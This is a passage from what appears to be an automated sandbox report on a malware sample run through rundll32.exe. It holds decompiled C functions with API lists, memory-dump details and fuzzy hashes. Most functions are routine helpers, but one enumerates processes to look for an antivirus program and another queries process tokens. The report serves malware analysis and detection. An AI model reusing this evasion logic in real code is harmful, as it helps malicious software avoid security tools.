							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x447c284);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                          0x0447487a
                                                          0x0447487e
                                                          0x04474880
                                                          0x04474881
                                                          0x04474889
                                                          0x04474889
                                                          0x0447488d
                                                          0x00000000
                                                          0x00000000
                                                          0x04474884
                                                          0x04474885
                                                          0x04474888
                                                          0x04474888
                                                          0x04474895
                                                          0x0447489a
                                                          0x044748a0
                                                          0x044748a8
                                                          0x044748ae
                                                          0x044748b0
                                                          0x044748b5
                                                          0x044748b9
                                                          0x044748bb
                                                          0x044748be
                                                          0x044748c5
                                                          0x044748c5
                                                          0x044748cf
                                                          0x044748d2
                                                          0x044748d3
                                                          0x044748d5
                                                          0x044748e1
                                                          0x044748e1
                                                          0x044748ee

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,050195AC,?,04475D25,?,0447243F,050195AC,?,04475D25), ref: 04474889
                                                          • StrTrimA.SHLWAPI(?,0447C284,00000002,?,04475D25,?,0447243F,050195AC,?,04475D25), ref: 044748A8
                                                          • StrChrA.SHLWAPI(?,00000020,?,04475D25,?,0447243F,050195AC,?,04475D25), ref: 044748B3
                                                          • StrTrimA.SHLWAPI(00000001,0447C284,?,04475D25,?,0447243F,050195AC,?,04475D25), ref: 044748C5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID:
                                                          • API String ID: 3043112668-0
                                                          • Opcode ID: c9c9a91882bceac5f3e26f42e316d44a797243567a26e0e572e396abdde67671
                                                          • Instruction ID: a951303074d73d38234743a03d4520ad7da90e4fa6d50857e687ffa3b8bb60ab
                                                          • Opcode Fuzzy Hash: c9c9a91882bceac5f3e26f42e316d44a797243567a26e0e572e396abdde67671
                                                          • Instruction Fuzzy Hash: 1D012875A017659FD6209F658C48E7BBBDCFF86AA4F12051AF941D7340EB64E80386A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0447A65C, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E0447A65C() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x447d2a8; // 0xb9a5a8
						_t2 = _t9 + 0x447ee34; // 0x73617661
						_push( &_v264);
						if( *0x447d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                          0x0447a667
                                                          0x0447a671
                                                          0x0447a675
                                                          0x0447a67f
                                                          0x0447a6b0
                                                          0x0447a686
                                                          0x0447a68b
                                                          0x0447a698
                                                          0x0447a6a1
                                                          0x0447a6b8
                                                          0x0447a6a3
                                                          0x0447a6ab
                                                          0x00000000
                                                          0x0447a6ab
                                                          0x0447a6b9
                                                          0x0447a6ba
                                                          0x00000000
                                                          0x0447a6ba
                                                          0x00000000
                                                          0x0447a6b4
                                                          0x0447a6c0
                                                          0x0447a6c5

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0447A66C
                                                          • Process32First.KERNEL32(00000000,?), ref: 0447A67F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 0447A6AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 0447A6BA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: dd145ca916aa65c297d357144677cc1c31bae60f06b0cbf1450be7aeab7950e4
                                                          • Instruction ID: 362eaba81b6d5d50f8d01bd63046df6b7cdf2b868f5381ddc4e76d461bf176fe
                                                          • Opcode Fuzzy Hash: dd145ca916aa65c297d357144677cc1c31bae60f06b0cbf1450be7aeab7950e4
                                                          • Instruction Fuzzy Hash: C5F096766011146AEF20BAA69C89DEF776CDBC5215F010166E945E2200EA24E94B86A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04476840, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04476840(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                          0x0447684a
                                                          0x0447684e
                                                          0x04476863
                                                          0x04476865
                                                          0x0447686a
                                                          0x04476870
                                                          0x04476872
                                                          0x04476877
                                                          0x04476882
                                                          0x04476879
                                                          0x04476879
                                                          0x04476879
                                                          0x04476877
                                                          0x04476890

                                                          APIs
                                                          • memset.NTDLL ref: 0447684E
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 04476863
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04476870
                                                          • CloseHandle.KERNEL32(?), ref: 04476882
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: 89a1696cc8c5043104d918fadc7e6130a40835eddd9a4fc599905e43d5cee548
                                                          • Instruction ID: a1c4501c6ce93e050a7d105e044a5c3ae0272506700ec6b6f4fcf57d21242ea6
                                                          • Opcode Fuzzy Hash: 89a1696cc8c5043104d918fadc7e6130a40835eddd9a4fc599905e43d5cee548
                                                          • Instruction Fuzzy Hash: 41F0E9F110170C7FE7206F62DCC4C27BBACEB511EDB124A2EF04681101C635BC064BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04471B42, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04471B42() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x447d26c; // 0x2cc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x447d2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x447d26c; // 0x2cc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x447d238; // 0x4c20000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                          0x04471b42
                                                          0x04471b49
                                                          0x04471b93
                                                          0x04471b95
                                                          0x04471b95
                                                          0x04471b4d
                                                          0x04471b53
                                                          0x04471b58
                                                          0x04471b5c
                                                          0x04471b62
                                                          0x04471b69
                                                          0x00000000
                                                          0x00000000
                                                          0x04471b6b
                                                          0x04471b70
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04471b70
                                                          0x04471b72
                                                          0x04471b7a
                                                          0x04471b7d
                                                          0x04471b7d
                                                          0x04471b83
                                                          0x04471b8a
                                                          0x04471b8d
                                                          0x04471b8d
                                                          0x00000000

                                                          APIs
                                                          • SetEvent.KERNEL32(000002CC,00000001,04474F0E), ref: 04471B4D
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04471B5C
                                                          • CloseHandle.KERNEL32(000002CC), ref: 04471B7D
                                                          • HeapDestroy.KERNEL32(04C20000), ref: 04471B8D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: bf914219129e5bd52b802c0b67133e3b638acdcfe504286f3577089e858349ea
                                                          • Instruction ID: eedf1a27abdb1882157a227d3d454d4fb7ffe87f0bf454093ee9f3785ae679e5
                                                          • Opcode Fuzzy Hash: bf914219129e5bd52b802c0b67133e3b638acdcfe504286f3577089e858349ea
                                                          • Instruction Fuzzy Hash: 8CF030B1A1135197FF105B75ED88E977B98EF047617080211B905E7790EB38ED4796A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 044723F4, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E044723F4(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x447d32c; // 0x50195b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x447d32c; // 0x50195b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x447d030) {
					HeapFree( *0x447d238, 0, _t8);
				}
				_t14[1] = E0447486F(_v0, _t14);
				_t11 =  *0x447d32c; // 0x50195b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                          0x044723f4
                                                          0x044723f4
                                                          0x044723fd
                                                          0x0447240d
                                                          0x0447240d
                                                          0x04472412
                                                          0x04472417
                                                          0x00000000
                                                          0x00000000
                                                          0x04472407
                                                          0x04472407
                                                          0x04472419
                                                          0x0447241d
                                                          0x0447242f
                                                          0x0447242f
                                                          0x0447243f
                                                          0x04472442
                                                          0x04472447
                                                          0x0447244b
                                                          0x04472451

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(05019570), ref: 044723FD
                                                          • Sleep.KERNEL32(0000000A,?,04475D25), ref: 04472407
                                                          • HeapFree.KERNEL32(00000000,00000000,?,04475D25), ref: 0447242F
                                                          • RtlLeaveCriticalSection.NTDLL(05019570), ref: 0447244B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 7a6b968c7e192ef469ab6c8d93d9fdc9d593c392cab2bdc21eceddb59b13e103
                                                          • Instruction ID: c1414be776e7b5e3664277cf43cf063a2680e35821656746e9639579e6ead146
                                                          • Opcode Fuzzy Hash: 7a6b968c7e192ef469ab6c8d93d9fdc9d593c392cab2bdc21eceddb59b13e103
                                                          • Instruction Fuzzy Hash: 3AF058B0A002809BFB209FA8EA89F5A77E4FF08740B008446F505D6252CB28FC43CB25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04476702, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E04476702() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x447d32c; // 0x50195b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x447d32c; // 0x50195b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x447d32c; // 0x50195b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x447e81a) {
					HeapFree( *0x447d238, 0, _t10);
					_t7 =  *0x447d32c; // 0x50195b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                          0x04476702
                                                          0x0447670b
                                                          0x0447671b
                                                          0x0447671b
                                                          0x04476720
                                                          0x04476725
                                                          0x00000000
                                                          0x00000000
                                                          0x04476715
                                                          0x04476715
                                                          0x04476727
                                                          0x0447672c
                                                          0x04476730
                                                          0x04476743
                                                          0x04476749
                                                          0x04476749
                                                          0x04476752
                                                          0x04476754
                                                          0x04476758
                                                          0x0447675e

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(05019570), ref: 0447670B
                                                          • Sleep.KERNEL32(0000000A,?,04475D25), ref: 04476715
                                                          • HeapFree.KERNEL32(00000000,?,?,04475D25), ref: 04476743
                                                          • RtlLeaveCriticalSection.NTDLL(05019570), ref: 04476758
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: b2a3c248b260b7940d18de9eec32c198a40a74a17e9850ed3bca306fd5d56367
                                                          • Instruction ID: 5595d64c4df33b3eebbbf2b4beb1c0a0b44d95df2f0d90b7d4fa826269a59141
                                                          • Opcode Fuzzy Hash: b2a3c248b260b7940d18de9eec32c198a40a74a17e9850ed3bca306fd5d56367
                                                          • Instruction Fuzzy Hash: 75F0B2B4A105409BFB188FA4DA99B5677E6EF48750B05800AE906DB360CB3CBC03CE51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04475AF1, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E04475AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E0447A71F(_t2);
				if(_t34 != 0) {
					_t30 = E0447A71F(_t28);
					if(_t30 == 0) {
						E0447A734(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0447A782(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0447A782(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                          0x04475af1
                                                          0x04475afb
                                                          0x04475afd
                                                          0x04475b03
                                                          0x04475b03
                                                          0x04475b0c
                                                          0x04475b10
                                                          0x04475b1c
                                                          0x04475b20
                                                          0x04475b94
                                                          0x04475b22
                                                          0x04475b22
                                                          0x04475b26
                                                          0x04475b2b
                                                          0x04475b30
                                                          0x04475b4a
                                                          0x04475b39
                                                          0x04475b39
                                                          0x04475b3d
                                                          0x04475b40
                                                          0x04475b45
                                                          0x04475b45
                                                          0x04475b4f
                                                          0x04475b77
                                                          0x04475b7d
                                                          0x04475b80
                                                          0x04475b51
                                                          0x04475b53
                                                          0x04475b5b
                                                          0x04475b66
                                                          0x04475b6b
                                                          0x04475b6b
                                                          0x04475b87
                                                          0x04475b8e
                                                          0x04475b8f
                                                          0x04475b8f
                                                          0x04475b20
                                                          0x04475b9f

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04473E08,?,?,?,?,00000102,044767B8,?,?,00000000), ref: 04475AFD
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                            • Part of subcall function 0447A782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04475B2B,00000000,00000001,00000001,?,?,04473E08,?,?,?,?,00000102), ref: 0447A790
                                                            • Part of subcall function 0447A782: StrChrA.SHLWAPI(?,0000003F,?,?,04473E08,?,?,?,?,00000102,044767B8,?,?,00000000,00000000), ref: 0447A79A
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04473E08,?,?,?,?,00000102,044767B8,?), ref: 04475B5B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04475B6B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04475B77
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: faef8ae9dfd8df54c6c1b67a869df4161621ab73472b9e4c2dc250ca8e8dbdf5
                                                          • Instruction ID: 4396309be2d591932cf819e16512bc1d9bb2eb3fde19846458666a88681f1bf1
                                                          • Opcode Fuzzy Hash: faef8ae9dfd8df54c6c1b67a869df4161621ab73472b9e4c2dc250ca8e8dbdf5
                                                          • Instruction Fuzzy Hash: 5D219076504259FBDF126F75CC84AEFBFB9AF06294B054056F9059F202E734E90287E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 044745C6, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E044745C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E0447A71F(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                          0x044745db
                                                          0x044745df
                                                          0x044745e9
                                                          0x044745ee
                                                          0x044745f3
                                                          0x044745f5
                                                          0x044745fd
                                                          0x04474602
                                                          0x04474610
                                                          0x04474615
                                                          0x0447461f

                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,0501935C,?,04478D93,004F0053,0501935C,?,?,?,?,?,?,0447523E), ref: 044745D6
                                                          • lstrlenW.KERNEL32(04478D93,?,04478D93,004F0053,0501935C,?,?,?,?,?,?,0447523E), ref: 044745DD
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,04478D93,004F0053,0501935C,?,?,?,?,?,?,0447523E), ref: 044745FD
                                                          • memcpy.NTDLL(74B069A0,04478D93,00000002,00000000,004F0053,74B069A0,?,?,04478D93,004F0053,0501935C), ref: 04474610
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: c8848364c18c99f05007f18fc3236697e25c3ee5c09d382a194f66e267f90275
                                                          • Instruction ID: 2771f04596e979903067f613ee0cf66a9dd6d800b098d8eb2619722f6ffcbaec
                                                          • Opcode Fuzzy Hash: c8848364c18c99f05007f18fc3236697e25c3ee5c09d382a194f66e267f90275
                                                          • Instruction Fuzzy Hash: 8EF04936900118BBDF11EFA9CC84CDFBBADEF092687114067EA04D7202E735EA158BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0447361A, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(05019A78,00000000,00000000,7742C740,044720ED,00000000), ref: 0447362A
                                                          • lstrlen.KERNEL32(?), ref: 04473632
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • lstrcpy.KERNEL32(00000000,05019A78), ref: 04473646
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04473651
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: 3780ab004b14137a66222e47b6f7d29df7b3c515af8b216378b1e59e52b19d9c
                                                          • Instruction ID: eafc7230d7942917440def38d78cc293a961eb50b4fa0f6cce92e147ae396abb
                                                          • Opcode Fuzzy Hash: 3780ab004b14137a66222e47b6f7d29df7b3c515af8b216378b1e59e52b19d9c
                                                          • Instruction Fuzzy Hash: 7CE01273901661679B11AFE5AC88C9FBBADEF99651704041BF701D3210C729DD079BE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: rundll32.exe PID: 2788 Parent PID: 1112 rundll32.exeCOMMON

                                                          Executed Functions

                                                          Function 04C05A27, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E04C05A27(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04C0A71F(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04C0A734(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                          0x04c05a34
                                                          0x04c05a35
                                                          0x04c05a36
                                                          0x04c05a37
                                                          0x04c05a38
                                                          0x04c05a3c
                                                          0x04c05a43
                                                          0x04c05a52
                                                          0x04c05a55
                                                          0x04c05a58
                                                          0x04c05a5f
                                                          0x04c05a62
                                                          0x04c05a65
                                                          0x04c05a68
                                                          0x04c05a6b
                                                          0x04c05a76
                                                          0x04c05a78
                                                          0x04c05a81
                                                          0x04c05a89
                                                          0x04c05a8b
                                                          0x04c05a9d
                                                          0x04c05aa7
                                                          0x04c05aab
                                                          0x04c05aba
                                                          0x04c05abe
                                                          0x04c05ac7
                                                          0x04c05acf
                                                          0x04c05acf
                                                          0x04c05ad1
                                                          0x04c05ad1
                                                          0x04c05ad9
                                                          0x04c05adf
                                                          0x04c05ae3
                                                          0x04c05ae3
                                                          0x04c05aee

                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04C05A6E
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04C05A81
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04C05A9D
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04C05ABA
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04C05AC7
                                                          • NtClose.NTDLL(?), ref: 04C05AD9
                                                          • NtClose.NTDLL(00000000), ref: 04C05AE3
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: 007ff067ef3f4fa65a8cf5f7732837c5fbc3235e60ce7dfffce1e82517192045
                                                          • Instruction ID: caf6203e42b7c74431bf9614bbc94a6a73ae376caa66965791336f664bd6f3fa
                                                          • Opcode Fuzzy Hash: 007ff067ef3f4fa65a8cf5f7732837c5fbc3235e60ce7dfffce1e82517192045
                                                          • Instruction Fuzzy Hash: 4721E676900218BBDF01EF95CC85ADEBFBEEF08754F108126F905E6150D7759A84DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C051B0, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 83%
